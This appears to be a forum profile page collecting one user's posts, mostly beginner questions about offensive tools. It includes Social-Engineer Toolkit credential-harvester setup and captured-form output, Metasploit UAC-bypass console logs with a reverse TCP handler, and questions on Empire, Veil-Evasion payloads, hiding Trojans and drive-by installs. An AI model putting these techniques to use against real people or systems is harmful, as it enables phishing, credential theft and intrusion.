Jump to content

isaac_204

Active Members
  • Posts

    26
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

isaac_204's Achievements

Newbie

Newbie (1/14)

  1. Okay so I reset the settings to default and I stopped apache2 and everything is working fine. However the reason I wanted to change the port from 80 to a different one is, because I can't port forward port 80 as it's blocked by my ISP. Also I don't mind how the URL looks since I'm just experimenting with SET. So my question is how can I change the port the Credentials Harvester runs on to another one? I've already tried to change the port in the set.config file "WEB_PORT=443" and when I access the cloned site by typing in the URL bar "192.168.1.16:443" it loads normaly but when I type anything on the email or password field and press enter instead of getting the credentials I get this error in the terminal: The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] The Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 443 [*] Information will be displayed to you as it arrives below: 192.168.1.4 - - [17/Nov/2017 09:08:09] "GET / HTTP/1.1" 200 - [*] WE GOT A HIT! Printing the output: POSSIBLE USERNAME FIELD FOUND: __user=0 PARAM: __a=1 PARAM: __dyn=7AzHK4GgO649UrJxm2q3miWGey8jrWo466ES2Sq2i5U4e2O2K48jyRyUrxuF98qDKaxeUW2ei5pQ14DBxe6ohx3ypUb8uz8bo5aayrgS2m4o9EfEmCxK9geE84eCUmzpEowWCwk84e9xCWK6oc9oy6oswgE-2mbx-8K4uazrwjQEzyUWf-4Uy68sKbxqfyBgoUhyo947Ey PARAM: __req=1 PARAM: __be=-1 PARAM: __pc=PHASED:DEFAULT PARAM: __rev=3463961 PARAM: lsd=AVqk3QFo [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. [*] WE GOT A HIT! Printing the output: PARAM: __a=1 PARAM: __be=-1 PARAM: __dyn=7AzHK4GgO649UrJxm2q3miWGey8jrWo466ES2Sq2i5U4e2O2K48jyRyUrxuF98qDKaxeUW2ei5pQ14DBxe6ohx3ypUb8uz8bo5aayrgS2m4o9EfEmCxK9geE84eCUmzpEowWCwk84e9xCWK6oc9oy6oswgE-2mbx-8K4uazrwjQEzyUWf-4Uy68sKbxqfyBgoUhyo947Ey PARAM: __pc=PHASED:DEFAULT PARAM: __req=2 PARAM: __rev=3463961 POSSIBLE USERNAME FIELD FOUND: __user=0 PARAM: lsd=AVqk3QFo PARAM: ph=C3 POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"9ji6lu","posts":[["gk2_exposure",{"identifier":"AT4VyfQf3AxNUabC3SATM7_xd3xkC31NlKa_FXDE7lw97X0965wlsUibcquLjraBX7mXtYDQGZnGD-wbNL5JRq1O","hash":"AT69GYK4kJlcg4KX"},1510902488583,0],["script_path_change",{"source_path":null,"source_token":null,"dest_path":"/login.php","dest_token":"ad976420","impression_id":"104d7e83","cause":"load","referrer":""},1510902488591,0],["scuba_sample",{"int":{"clientWidth":1583,"clientHeight":940},"normal":{"view":"normal"},"_ds":"www_tinyview_port","_options":{"addBrowserFields":true}},1510902488649,0],["time_spent_bit_array",{"tos_id":"9ji6lu","start_time":1510902488,"tos_array":[505,0],"tos_len":9,"tos_seq":0,"tos_cum":7},1510902496587,0],["ods:ms.time_spent.qa.www",{"time_spent.bits.js_initialized":[1]},1510902496590,0]],"trigger":"ods:ms.time_spent.qa.www","send_method":"ajax"}] PARAM: ts=1510902496594 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
  2. Hello fellows! Once again I need your help ! I have a problem with the ports I'm using on the Social Engineering Toolkit. By default the Credentials Harvester runs on port 80 but I wanted to change the port to another one like 443 or 4444 etc. However when I change the port from the set.config file the Credentials Harvester doesn't work so I changed the port that apache2 was listening on to the same port the Creds Harvester was listening on and when I try to run it I get this message: The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] The Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 4444 [*] Information will be displayed to you as it arrives below: [*] Looks like the web_server can't bind to 80. Are you running Apache? Do you want to attempt to disable Apache? [y/n]: Also I enabled APACHE_SERVER in the set.config file. Can anybody enlighten me with their knowledge?! Thanks in advance!
  3. Its all good now everything works flawless thank you for your time!
  4. Much appreciated I'll try it and hopefully everything is okay! Many thanks!
  5. Thanks for the replies! /etc/apt/sources.list: # # deb cdrom:[Debian GNU/Linux 2017.1 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20170416-02:08]/ kali-rolling contrib main non-free #deb cdrom:[Debian GNU/Linux 2017.1 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20170416-02:08]/ kali-rolling contrib main non-free
  6. I have upgraded my Kali Rolling 2016.2 to Kali Rolling 2017.1 without a problem however the apt install command doesn't seem to work! I tried installing different tools that I know for sure that are included in metapackages like OpenVAS. I tried "apt-get install openvas" and "apt install openvas" but I always get the same message "Unable to find package ..." Does anyone have any ideas? Thank in advance!
  7. I got it working with Microsoft's tool. Seems like Rufus was damaging the ISO Image while mounting it on my USB. Many many thanks!
  8. I recently bought a Asus Laptop with FreeDOS and Im trying to install Windows 10 from a USB. I burnt the ISO image in my USB using Rufus then I entered the BIOS in my Asus laptop I enabled Legacy, disabled Secured Boot and put the USB first in the Boot order. However when I save and exit it boots into the free boot again, whatever I do it always boots into FreeDOS. I seriously need help. Any advice is very much appreciated!
  9. Yeah I have already port forwarded my router, however when using metasploit you create the payload and you put your WAN IP and then your local IP on the handler. The problem is that in Powershell Empire the stager and the listener share the same IP so either they both use the local IP or the WAN IP. That's what is confusing to me. Thank you for your time!
  10. How can someone use Powershell Empire for attacks over the internet? Do you need a server? Also can someone create a Veil-Evasion payload and then get a connection in Empire? It would be great if someone could use it outside of the network because Privilege Escalation is way easier than it is with Metasploit! Furthermore are there any tools for Post-Exploitation other than Metasploit , Powersploit? Any suggestions would be appreciated!
  11. It closes Meterpreter session 1 closed. Reason: Died and then Exploit failed: Timeout error. Check the last two lines of the post I wrote! Thanks in advance!
  12. Hello guys I ran into a problem trying to bypass the UAC on my Windows 7 machine. I used the bypassuac_vbs exploit but this is what happened. Thanks in advance! msf exploit(handler) > use exploit/windows/local/bypassuac_vbs msf exploit(bypassuac_vbs) > show options Module options (exploit/windows/local/bypassuac_vbs): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Exploit target: Id Name -- ---- 0 Automatic msf exploit(bypassuac_vbs) > set SESSION 1 SESSION => 1 msf exploit(bypassuac_vbs) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.1.14:4444 msf exploit(bypassuac_vbs) > [+] Windows 7 (Build 7601, Service Pack 1). may be vulnerable. [*] UAC is Enabled, checking level... [*] 192.168.1.5 - Meterpreter session 1 closed. Reason: Died [-] Exploit failed: Rex::TimeoutError Operation timed out.
  13. Thanks a lot that is a great selection of books just what I was looking for!
  14. Of course not I have built a virtual machine and I test everything there. I just want to learn more and more about pen testing. And most of the books I've read have only the basics. Also I'm open for book suggestions. Thanks in advance!
  15. Hello guys what are your methods of hiding a Trojan? And what is a Drive-By Install and how can I do it or where can I go to learn more about it?
×
×
  • Create New...